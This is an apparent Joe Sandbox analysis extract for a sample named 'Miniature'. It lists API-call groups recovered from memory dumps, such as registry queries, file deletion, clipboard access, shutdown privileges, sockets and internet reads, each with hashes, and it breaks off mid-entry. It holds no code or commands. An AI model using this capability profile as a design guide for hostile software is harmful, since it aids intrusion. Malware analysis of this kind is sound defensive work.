                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: c5569f1a84477bccbf117c015b97c4d67684b37ffaa9a29545cd9f0c1f61a12f
                                                                                                                                                                                                                                                                                            • Instruction ID: e06b11c96d1700ba9e58cd1282c491be7bd02b1af2e27c7606379fa32b901b1e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5569f1a84477bccbf117c015b97c4d67684b37ffaa9a29545cd9f0c1f61a12f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B731E5715006196BEF20BFA5DC09BDE77AC9F45328F104163E826A31A0EB71DF45CB59
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9C10E,?,?), ref: 00C9D415
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D451
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9C99E
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00C9CA09
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9CA2D
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C9CA8C
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C9CB47
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C9CBB4
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C9CC49
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00C9CC9A
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C9CD43
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C9CDE2
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9CDEF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e1efc8a8fbf0a2e1d9e6172d11e437db3e01a592f00bdaa09a4ed1702c2d1192
                                                                                                                                                                                                                                                                                            • Instruction ID: 10adec99a4ce7a37a87ec972e2734f452f07a74a4aabc1e0b0fc943a2a2cc763
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1efc8a8fbf0a2e1d9e6172d11e437db3e01a592f00bdaa09a4ed1702c2d1192
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF024071604200AFDB14DF28C8D5E2ABBE5EF49314F18849DF85ACB2A2DB31ED46DB51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C155D1,?,?,00C54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C15871
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7EAB0: GetFileAttributesW.KERNEL32(?,00C7D840), ref: 00C7EAB1
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C7D9CD
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C7DA88
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C7DA9B
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C7DAB8
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7DAE2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C7DAC7,?,?), ref: 00C7DB5D
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?), ref: 00C7DAFE
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7DB0F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                            • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                            • Opcode ID: 7dd2022c829c9ea8ae4c6beb12daf8b794db659b13e5dcad09b10274b3c3ff76
                                                                                                                                                                                                                                                                                            • Instruction ID: 9f3bdef2729e75c163799bcc764151889159aafb8a77651e6200d60200b5bd74
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7dd2022c829c9ea8ae4c6beb12daf8b794db659b13e5dcad09b10274b3c3ff76
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29616A3180510DAFCF05EBE0DA92AEDB7B5AF16304F2081A5E40A77195EB315F4AEF60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ba1391b14f08eeb79067ea66d8d0d56a7ffe1cd11cce107c3871f55c1a833332
                                                                                                                                                                                                                                                                                            • Instruction ID: fdba151f60ac022939a7bea427a062166565b30f6975cf5400737aac4d5b3a07
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba1391b14f08eeb79067ea66d8d0d56a7ffe1cd11cce107c3871f55c1a833332
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17418D31604611AFE314DF15D888B597BE4EF4631CF14C4ADE86A8FAA2CB35ED42CB94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7205A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C72087
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: GetLastError.KERNEL32 ref: 00C72097
                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00C7F249
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                            • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                            • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                            • Opcode ID: 628a87d0d54f3523e30b75972e806779fef03c0bf5e3f23df42a0994ba66aedf
                                                                                                                                                                                                                                                                                            • Instruction ID: fadd8dbec6a445de60e367815c176f3277ddb7c7008185181ff6bad7f324691d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 628a87d0d54f3523e30b75972e806779fef03c0bf5e3f23df42a0994ba66aedf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E01D67A7102146BEB1862B99CCABBE726C9F09394F158535FD17E31D3D5604E02A2A0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4BD54
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4BD78
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4BEFF
                                                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00CB46D0), ref: 00C4BF11
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00CE221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C4BF89
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00CE2270,000000FF,?,0000003F,00000000,?), ref: 00C4BFB6
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4C0CB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 314583886-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 83e79aa6765bfe30f1d2b983881efa9ba54f7617353b80d49d4d8c1174a6dd66
                                                                                                                                                                                                                                                                                            • Instruction ID: 0059559f07f0116624302ab480596fd0220ca654c5d27677a822e7726396040a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 83e79aa6765bfe30f1d2b983881efa9ba54f7617353b80d49d4d8c1174a6dd66
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DBC13731D00249AFDB249F79CC41BAEBBB8FF81320F1441AAE5A59B251E730DE42DB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C556C2,?,?,00000000,00000000), ref: 00C83A1E
                                                                                                                                                                                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C556C2,?,?,00000000,00000000), ref: 00C83A35
                                                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00C556C2,?,?,00000000,00000000,?,?,?,?,?,?,00C166CE), ref: 00C83A45
                                                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00C556C2,?,?,00000000,00000000,?,?,?,?,?,?,00C166CE), ref: 00C83A56
                                                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00C556C2,?,?,00C556C2,?,?,00000000,00000000,?,?,?,?,?,?,00C166CE,?), ref: 00C83A65
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                                                                            • String ID: SCRIPT
                                                                                                                                                                                                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                                            • Opcode ID: ff62ec53d7f97cd76eb922ab8cd808a7191633d1753bb6f4920cf44f91eafa96
                                                                                                                                                                                                                                                                                            • Instruction ID: 4e07dfe53288ca35c29de8add9cbdba73f6262f1946772e2022ea046b8aaf0dc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff62ec53d7f97cd76eb922ab8cd808a7191633d1753bb6f4920cf44f91eafa96
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F9117C70200701BFD7259B65DC48F6B7BB9EBC5B48F14426CB81297690DBB1DD01D620
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C71916
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C71922
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C71931
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C71938
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C7194E
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00C71C81), ref: 00C720FB
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C72107
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C7210E
                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C72127
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00C71C81), ref: 00C7213B
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C72142
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 244b9484e5eedc22dac9f4d6950c11ccd723091e3aa92455eb8301c310b3d7b1
                                                                                                                                                                                                                                                                                            • Instruction ID: c0f1244563ee2c998de56ca91be3a59d6c7a096ceb3f6c543027655ba2b0e55d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 244b9484e5eedc22dac9f4d6950c11ccd723091e3aa92455eb8301c310b3d7b1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D11D071600205FFDB109F64CC09BAE7BB9FF4535AF548018EA5B97120C7359E41CB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C8A5BD
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C8A6D0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C842B9: GetInputState.USER32 ref: 00C84310
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C842B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C843AB
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C8A5ED
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C8A6BA
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: d02e98831e66fc6a46da6f3efe01095ff9fcc56eb43f68b5b6ed10ebd190e22c
                                                                                                                                                                                                                                                                                            • Instruction ID: 479ca8afff5b35e4966eac1091930d0ec5fc530bc26a17f1c2e7ab68133d04db
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d02e98831e66fc6a46da6f3efe01095ff9fcc56eb43f68b5b6ed10ebd190e22c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E414F7190020AAFDF14EF64C849AEEBBB4FF05318F144156F815A21A1EB309F84DF65
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,?), ref: 00C1233E
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00C12421
                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00C12434
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$Proc
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9ad8b5f09b7e730fb7f786eca2e81522a75c4e3ce0c378d932660ccdc4b8b43e
                                                                                                                                                                                                                                                                                            • Instruction ID: 326d1838a1383845948cb9871ee5fcef8225d393f9af27fa60137effe146a02b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9ad8b5f09b7e730fb7f786eca2e81522a75c4e3ce0c378d932660ccdc4b8b43e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A8158FC504484BEE22C663E4C89EFF154DDB47385F550109F922C65A2C9698FE2B23A
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C93AD7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93AAB: _wcslen.LIBCMT ref: 00C93AF8
                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C922BA
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C922E1
                                                                                                                                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00C92338
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C92343
                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00C92372
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6c49d34332d4b1c5c73bfeac559f79ef0ef8180e79bdbf2e84c9c832aa429327
                                                                                                                                                                                                                                                                                            • Instruction ID: 426a5c43d6a0237c490dcfdcc0662c6579ccd9413106dcd774551f222cfe8b5c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c49d34332d4b1c5c73bfeac559f79ef0ef8180e79bdbf2e84c9c832aa429327
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3751F775A00210AFDB10AF24C886F6A77E5AF46768F488048F9569F3D3CB74AD41DBE1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1206f6cb78dc668c9ded26421e118af669096fbbca97820d546eac8a4b993db0
                                                                                                                                                                                                                                                                                            • Instruction ID: 899fcc313cc030ab65891f424c41d565bd3e078086568b9211c7609be2e59644
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1206f6cb78dc668c9ded26421e118af669096fbbca97820d546eac8a4b993db0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8421F4317002228FD7119F2AC844B5A7BE5EF87318F588068E85ACB351CB71EF42CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00C8D8CE
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C8D92F
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 00C8D943
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ca62c86aced49dedde83a368af7d78d160dc1f065313968a776a80a1839ff5d3
